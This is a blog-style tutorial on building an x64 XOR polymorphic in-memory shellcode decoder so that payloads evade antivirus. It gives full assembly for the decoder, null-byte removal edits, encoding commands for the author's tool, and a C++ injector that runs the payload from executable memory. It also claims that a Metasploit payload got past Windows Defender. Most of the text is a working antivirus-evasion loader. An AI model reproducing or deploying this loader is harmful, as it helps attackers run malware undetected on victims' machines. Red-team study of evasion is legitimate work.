Red-teaming and penetration tests often require virus scanners to be bypassed in order to effectively detect security vulnerabilities. In the last part we looked at disguising shellcode as a UUID in the source code. This also worked well, but the shellcode was recognised in memory and blocked.
We now want to solve this with a polymorphic in-memory decoder: A shellcode that decodes shellcode.
I have taken the XOR decoder from doyler.net and adapted it to the x64 architecture. This was quite simple, as only the corresponding registers had to be renamed. The decoder starts with this instruction:
_start: jmp short call_decoder ; Begin of JMP-CALL-POP
JMP-CALL-POP
is a technique that allows us to execute code independently of memory. In this first step, we now jump to the jump label call_decoder
call_decoder: call decoder ; RSP points to the next instruction (the shellcode) ; The encoded shellcode Shellcode: db 0x6a,0x77,0xb6...
Here we see that the CALL
-instruction directly calls another part of the programme. As soon as this happens, the register RSP
saves the pointer to the next command (in our case the shellcode) on the stack.
decoder: pop rsi ; Move pointer to encoded shellcode into RSI from the stack
In the called part of the programme, we save the pointer from the stack to the register RSI
and know where to address our shellcode in memory.
Now we move on to the actual decryption routine:
decode: xor byte [rsi], 0x3F ; The byte RSI points to, will be XORed by 0x3F jz Shellcode ; jump out of the loop if 0: RSI xor 0x3F = 0 inc rsi ; increment RSI to decode the next byte jmp short decode ; loop until each byte was decoded
xor byte [rsi], 0x3F
now decodes the byte represented by RSI
is addressed. In this case, this is the first byte of the shellcode. The key for decoding is 0x3F
and can be changed according to the original coding.
jz Shellcode
now checks whether the decoded byte 0x00
corresponds.
If the result is negative, the code jumps to the next instruction: inc rsi
RSI
is incremented and thus points to the next byte in the shellcode, which is decoded during the next run. jmp short decode
jumps back to the beginning of the function.
If the result is positive, the loop is interrupted and the shellcode is executed. It is important to append the key to the shellcode here, because:
0x3F XOR 0x3F = 0x00
This marks the end of the shellcode and interrupts the loop. We therefore do not need an additional counter.
jz shellcode
now jumps directly to our decoded shellcode and executes it.
We want to execute the calc.exe
payload from from this blog post. However, this still contains 0 bytes, which prevent decoding. Why is this the case? Here is an example:
# Encoding XOR Key: 0x3F Byte: 0x00 0x00 XOR 0x3F = 0x3F # Decoding XOR Key: 0x3F Byte: 0x3F 0x3F XOR 0x3F = 0x00
A 0-byte would thus abort the encoding process early, since jz shellcode
would regard this as a signal to terminate. We therefore need to make a few modifications.
The fix for the GS register from the previous post only removes $2/3$ 0 bytes. This was sufficient for the previous tests. A small change brings us to our goal here:
xor rax, rax mov al, 60h mov rax, gs:[rax] ; 65 48 8b 00
change to:
xor rax, rax mov rax, gs:[rax+0x60] ; 65 48 8b 40 60
This also reduces the size of our shellcode a little.
When searching for Kernel32Base
we only use the register RAX
without calculation. This also results in a 0 byte. Here, however, we can use the register RBX
register and thus avoid the 0 bytes.
mov rax, [rax] ; 48 8b 00 mov rax, [rax] ; 48 8b 00
change to:
mov rbx, [rax] ; 48 8b 18 mov rax, [rbx] ; 48 8b 03
jmp short InvokeWinExec ; eb 00
Here the code jumps to the next instruction. As the code also does this without JMP
we can comment out the line.
We can compile the code and get a clean op-code.
nasm -f win64 calc.asm -o calc.o
We now need to edit the op-code a little in order to be able to use it in the decoder. I use my ShellCode tool for this ShenCode:
python shencode.py extract -i calc.o -o calc.raw -fb 60 -lb 311 ... python shencode.py xorencode -i calc.raw -o calc.xor -k 63 ... python shencode.py formatout -i calc.xor -s cs [*] processing shellcode format... 0x6a,0x77,0xb6, ... 0x07,0x77,0xbc,0xfb,0x27,0x77,0xbc,0xfb,0x37,0x62 [+] DONE!
Step by step:
calc.o
and save it in calc.raw
(from offset 60
to 311
)63
and save the result in calc.xor
, 63
decimal corresponds to 3F
Hexadecimal
We save the output, remove the line breaks and append our “magic byte” 0x3F
at the end.
Now we can add our payload to the XOR decoder. To do this, we copy the previously prepared code into the last instruction of the XOR decoder:
; The encoded shellcode Shellcode: db 0x6a,0x77,0xb6,...0x37,0x62,0x3f
We also check whether the XOR key matches:
decode: xor byte [rsi], 0x3F
If everything is correct, we compile our decoder:
nasm -f win64 xor-decoder.asm -o xor-decoder.o
We then search for the shellcode offsets, extract our code and prepare it for our Inject.cpp
file:
python shencode.py formatout -i xor-decoder.o -s inspect 0x00000048: 00 00 00 00 00 00 00 00 0x00000056: 20 00 50 60 eb 0b 5e 80 Offset=60 0x00000064: 36 3f 74 0a 48 ff c6 eb ... 0x00000320: bc fb 27 77 bc fb 37 62 0x00000328: 3f 2e 66 69 6c 65 00 00 Offset=329 0x00000336: 00 00 00 00 00 fe ff 00 python shencode.py extract -i xor-decoder.o -o xor-decoder.stub -fb 60 -lb 329 [*] try to open file [+] reading xor-decoder.o successful! [*] cutting shellcode from 60 to 329 [+] written shellcode to xor-decoder.stub [+] DONE! python shencode.py formatout -i xor-decoder.stub -s c [*] processing shellcode format... "\xeb\x0b\x5e...\x37\x62\x3f""; [+] DONE!
We can now insert the bytes we have just prepared into our injector programme and compile it.
#include <stdio.h> #include <windows.h> #include <iostream> #pragma warning unsigned char payload[] = "\xeb\x0b\x5e...\x37\x62\x3f"; int main() { size_t byteArrayLength = sizeof(payload); std::cout << "[x] Payload size: " << byteArrayLength << " bytes" << std::endl; void* (*memcpyPtr) (void*, const void*, size_t); void* exec = VirtualAlloc(0, byteArrayLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE); memcpyPtr = &memcpy; memcpyPtr(exec, payload, byteArrayLength); ((void(*)())exec)(); return 0; }
For testing purposes, I have started a debugger and am now navigating to the memory area of the XOR decoder. During the debug, you can see step-by-step how the instructions in the lower area are decoded. This can be seen in the images below the call
statement (which is Shellcode: db ...
corresponds to).
The animation above shows the decoding loop, while the shellcode in the lower area is decoded step by step.
To simplify the process, I have integrated the XOR stub as a template in ShenCode as a template. With two commands, we generate an XOR in-memory decoder:
python shencode.py xorencode -i input.raw -o xor.out --key 63 python shencode.py xorpoly -i xor.out -o stub.raw --key 63
The XOR decoder provides effective memory protection. In combination with other obfuscation techniques, this can be a good helper for penetration tests. During my test, even the Metasploit payload was not detected by Windows Defender.